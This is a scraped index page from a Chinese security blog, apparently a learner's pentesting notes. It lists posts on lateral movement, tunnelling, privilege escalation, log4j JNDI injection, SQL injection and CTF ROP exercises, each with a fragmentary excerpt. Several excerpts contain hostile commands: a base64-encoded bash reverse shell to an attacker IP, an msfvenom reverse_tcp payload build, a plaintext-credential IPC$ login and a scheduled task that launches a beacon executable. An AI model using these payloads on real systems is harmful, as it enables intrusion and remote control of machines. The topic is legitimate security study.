- 博客(39)
- 收藏
- 关注
RSS订阅原创 内网安全-横向移动&Kerberos 攻击&SPN 扫描&WinRM&WinRS&RDP
2008版本以上默认开启,win 7默认关闭。检测使用cs内置端口扫描5985开放情况。双方开启winrm winrs服务。
2025-03-19 17:09:56
226
原创 内网渗透-smb协议-icmp协议-出入站规则上线
点击33.128主机右键选择ps64横向移动输入账户密码和可通讯主机。windows 2008 入站协议被封杀。使用反向连接上线windwos2008。通过cs扫描开启33网段开启445主机。使用smb协议创建监听器。生成木马后运行即可上线。
2025-03-19 10:16:24
289
原创 内网安全-横向移动&PTH 哈希&PTT 票据&PTK 密匙&Kerberos&密码喷射
windwos server 2012 R2之前可能是NTLM和LM,之后为NTLM。
2025-03-10 17:07:51
301
原创 Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2"args": {}],201表示创建成功POST /actuator/gateway/refresh HTTP/1.1Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2。
2025-01-16 10:17:55
905
原创 内网渗透横向移动1
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator #建立。@#45" /user:god.org\administrator#建立。DAILY /tr c:\beacon.exe /F #创。凭证提取->抓取hash/抓取明文密码。拷贝执行文件到目标机器。浏览探测->网络探测。
2024-11-25 00:10:03
359
原创 内网安全隧道搭建-ngrok-frp-nps-sapp
1.ngrok建立内网主机与公网跳板机的连接:内网主机为客户机:下载客户端执行2.frp。
2024-11-19 00:09:44
458
原创 内网渗透-隧道判断-SSH-DNS-icmp-smb-上线linux-mac
iodined -f -c -P hzy0 192.168.0.1 ns1.ttx.com -DD 设置密码 hzy0 并创建虚拟 IP 及绑定域名指向。服务器:设置密码 hzy0 并创建虚拟 IP 及绑定域名指向。尝试通讯尝试连接: ssh root@192.168.0.2。判断出网:nslookup www.baidu.com。内网主机只出网 DNS 协议数据,解决通讯。客户端:连接密码 hzy0 并绑定域名指向。、上线环境:内网主机只出网。上线:借助通讯后绑定上线。后门绑定监听器及生成。
2024-11-17 22:24:51
555
原创 隧道技术-tcp封装icmp出网
生成木马:msfvenom -p windows/meterpreter/reverse_tcp Lhost=127.0.0.1 LPORT=3333 -f exe > msf1.exe。木马运行在受害主机使用本地3333端口连接,由tcp协议转换未icmp协议数据出网,由kali接收,并且再次转会tcp协议。使用本地的127.0.0.1:9999tcp协议数据使用icmp封装传递给cs服务端。cs服务端执行:./ping -type server。使用msf接受tcp协议木马会话。3.cs木马转发上线。
2024-11-11 16:42:10
430
原创 内网渗透-域信息收集
获取域控ip:使用net time /domain 获取域,由于时间来自于域控,ping 域名可获取ip。判断是否有域:net time /domain ipconfig /all。从域控查询时间,若当前用户是域用户会从域控返回当前时间,亦。查看域内用户:net user /domain。用来判 断主域,主域一般用做时间服务器。查询当前登录域及登录用户信息。本机管理员【通常含有域用户】查询域管理员用户组和域管用户。查看加入域的所有计算机名。查看已启动的程序信息。
2024-11-09 21:20:15
307
原创 linux提权-RSYNC未授权访问覆盖
rsync rsync://39.101.162.36:873/src/etc/crontab ./,读取目标定时任务。原理:-v将容器外部的目录/root挂载到容器内部/mnt,使用-it参数进入容器shell。cat crontab 查看定时任务。判断:sudoedit -s /需要用户在docker组。usage报错则未有漏洞。
2024-11-09 17:38:27
352
原创 linux提权-环境变量提权-定时任务
一个可执行程序被管理员赋予了suid权限,可知此程序内容为调用ps命令,上传bash移动到可执行程序当前目录,并且更改名称为ps,添加环境变量当前目录,程序会调用可执行程序从而调用ps命令,也就是当前bash文件,从而提权。攻击通过对程序的运行,调试,反编译获知程序运行逻辑,尝试对程序调用的环境变量进行覆盖,导致程序加载继承权限。拷贝bash并且重命名为ps:cp /bin/bash /tmp/ps。定时任务执行的sh文件为777所有用户可更改sh脚本数据。
2024-11-06 23:54:56
238
原创 linux提权-suid提权-脏牛提权-脏管道提权
作用:让普通用户临时拥有该文件的属主的执行权限,suid权限只能应用在二进制可执行文件(命令)上,而且suid权限只能设置在属主位置上。suid权限使用s表示,增加权限u+s,移除权限u-s;使程序在执行过程中收到了suid 以root权限运行。网站搜索是否存在提权可能。(4)反弹shell。
2024-11-06 00:18:35
328
原创 windows 提权bypassuac,dll劫持,引号路径,不安全服务
利用Akagi64.exe 41 C:\phpstudy_pro\WWW\pikachu-master\vul\unsafeupload\uploads\msf.exe。原理:文件在执行的时候加载路径,如果是"c:\program (x86)\1.exe"则被视为完整路径。利用msf生成木马为program.exe的文件放置c盘符根路径,启动程序,msf会话监听可完成提权。如果为c:\program (x86)\1.exe 则被视为参数,前提未加引号路径需要带空格。使用msf生成dll文件。
2024-11-04 22:47:42
270
原创 windows提权
提权的原理:at命令是一个计划命令,这个命令调用的是system权限。适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除。适用版本:windows 7、8、03、08、12、16。权限需大于webshell权限,本地用户。适用于window 2k3。
2024-11-02 23:41:47
256
原创 mysql提权
1.sqlmap获取数据库密码,mysql数据库 user表 字段password,--dump -C "password" -T user -D mysql。2.读取user.MYD user.MYI user.frm 获取mysql账户密码 MYSQL/data/mysql。1.MYSQL=5.2 导出安装目录/lib/plugin/1.查询数据库版本,安装路径。2.使用msf进行udf提权。3.读取网站代码配置文件。
2024-10-30 20:20:34
158
原创 windows提权
windows/meterpreter/reverse_https #通过监听443端口反向连接。windows/meterpreter/reverse_http #通过监听80端口反向连接。windows/meterpreter/reverse_tcp #反向连接,常用。windows/meterpreter/bind_tcp #正向连接。2.基于补丁和系统版本位数来进行筛选可用溢出漏洞exp。netstat -ano 网络情况。systeminfo 漏洞补丁。
2024-10-27 23:58:10
138
原创 ceye-dnslog
检查是否为 http://detectportal.firefox.com/success.txt。print(f"发生错误: {err}")# 创建一个新的参数字典,用于更改参数。开始后测试每个参数 后查看ceye平台看看是否出现问题。# 返回,不继续处理此请求。# 检查请求是否成功。# 更改当前参数的值。# 打印更改后的参数。# 在这里添加处理响应的逻辑。# 启动mitmproxy代理服务器。
2024-01-14 20:52:07
664
1
原创 log4j-jndi注入(CVE-2021-44228)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "攻击机器ip"bash -i >& /dev/tcp/攻击机器ip/6666 0>&1。${jndi:ldap://dnslog子域名}
2024-01-13 00:09:14
577
1
原创 sql注入-排序注入
第二个参数只要不是xpath格式数据就可以所以需要concat来添加字符让其报错。目标请求为https://xxxx/?第一个参数和第三个随意填写。此处输入数据为3-1。
2024-01-11 12:23:17
712
原创 http请求走私
此漏洞由于前端和后端的解析不同导致。后端按照te进行解析也就是到0\r\n\r\n为止,但是G留在了缓存中导致下次请求出现了GPOST。这一种就是前端服务器使用TE头处理,而后端服务器使用CL头处理。cl=6 由于0\r\n\r\nG一共六个。
2024-01-02 16:15:47
532
1
原创 nps 未授权访问检测脚本 ——poc
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
2023-08-18 21:42:56
425
1
原创 中级 rop
第一步:利用write()输出write在内存中的地址。gadget是call qword ptr [r12+rbx*8],所以应该使用write.got的地址而不是write.plt的地址。并且为了返回到原程序中,重复利用buffer overflow的漏洞,我们需要继续覆盖栈上的数据,直到把返回值覆盖成目标函数的main函数为止。链接:https://www.jianshu.com/p/187798890345。商业转载请联系作者获得授权,非商业转载请注明出处。作者:Queen_耳又又。
2023-05-18 10:54:05
104
原创 ctf wiki ret2lib3
由于直接发送会导致,接下来接收的字符串并不是我们所需要的字符串。可能接收到printf函数输出的字符串。关于为什么会使用sendline而不是send 由于gets 函数遇到\n停止读取。注:不能直接用elf 去查看函数位置,因为查询的是plt处的func地址。通过泄露gots表中的数据去判断动态库的基地址。关于为什么第一次使用sendlineafter。
2023-05-16 10:18:32
132
原创 ctf wiki ret2libc2
具体思路为 构造两段gadgets ,第一段用于将字符串”/bin/sh“ 存储到某个地址。再构造system取出。注:汇编语言需要和地址p32();需要先给某个地址输入”/bin/sh“
2023-05-13 21:54:12
231
原创 ctf wiki ret2libc1
寻找system函数 使用gdb info function system。4.由于调用函数需要压入参数 , push eip 模仿调用。填充字节为:71c-6ac = 112(十进制)大概明白 最后一个函数是gets函数 存在漏洞。3.查看v4距离返回地址存在多少字节。发现开始nx(栈段不可执行)寻找”/bin/sh“1.检查安全保护机制。
2023-05-13 15:10:33
105
原创 ctf wiki rop基础 ret2syscall
内核接收到int 0x80中断后,需要查询IDT表来取出中断处理函数地址,这个地方比较细节的地方是,int 0x80的idt表中的DPL被设置成了3,所以才能从用户态能直接访问int 0x80的中断指令的。个人理解:当出现int 0x80 时候 ,进入内核,可以使用eax ebx,。从而执行对应的系统调用。,(不仅会插入中断指令,还会将系统调用编号设置给 %eax 寄存器)查看到 eax 和 esp 的值 如下 通过ebp-eax的值。来主动进入内核,这是用户程序发起的调用访问内核代码的唯一方式。
2023-05-12 22:47:24
120
原创 ctf-wiki rop ret2text
观察gets函数写入的数组地址为[esp+1ch],思路为查找esp为多少,因为当前是靠着esp定位地址。查看secure函数中获取到shell的地址(0804863a)2.拿到文件在kali linux中用ida打开。推断距离返回地址偏移的地址为:0x6c+4。于是字符串(esp+1ch)的地址为。推断距离edp的地址为:0x6c。1.下载ret2text文件。获取目标机器shell。
2023-05-09 23:08:21
296
原创 c语言调用栈(一)
在32位程序中,寄存器ebp指向栈帧的底部,用来存储当前栈帧的基址,在函数运行过程中不变,可以用来索引函数参数和局部变量的位置。当caller调用callee时,callee对应的栈帧就会被开辟,当调用结束返回caller时,callee对应的栈帧就会被销毁。将caller调用callee后的下一条指令的地址压入栈中,作为callee的返回地址,这样,当函数返回后可以正常执行接下来的指令。将当前ebp寄存器的值压入栈中,这是caller栈帧的基址,将ebp更新为当前的esp。参数传递方式为:从右向左压栈。
2023-05-06 20:07:16
149
原创 mapreduce之数据排序
/写入的目录应该是空的,否则报错。//reduce输出value。//2.创建Job,设置入口。//6.写出结果到hdfs。//5.进行reducer计。//1.连接hadoop。//4.进行mapper计算。//reduce输出key。//3.读取hdfs的数。//map输出value。//从小到大输出每个数字。//map输出 key。//每行 <成绩,1>
2023-05-06 13:38:41
166
原创 mapreduce 之 数据去重
/写入的目录应该是空的,否则报错。//具体实现方法 输出为 text,null。//reduce输出value。//2.创建Job,设置入口。//6.写出结果到hdfs。//5.进行reducer计。//1.连接hadoop。//4.进行mapper计算。//reduce输出key。//3.读取hdfs的数。//map输出value。//map输出 key。2.重写reduce阶段。
2023-05-06 10:05:53
351
1
原创 mapreduce之WordCount
3.选中lib中的所有jar包,点击右键,Build Path,Add to Build Path。输入key,输入value 输出key,输出value。map阶段读取:key(行),value(一行的值)map 阶段输出:key,value 为程序员定义。//2,创建job,设置入口。//LongWritable 输入key。//1.连接hadoop。//进行mapper计算。//进行reduce计算。//Text 输入 value。//Text 输出 key。注:map阶段会读取一行进行整合。
2023-05-05 22:14:43
183
1
原创 墨者学院简单sql注入
6.information_schema.tables:记录所有表 information_schema.colums:记录所有字段。id=1 and 1=2 判断是否存在注入。4查看数据库版本,数据库名称,数据库用户。group_concat()查看。3.union 查看回显。5查看操作系统和当前用户。查看数据库对应的表名。
2023-05-04 15:20:40
126
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人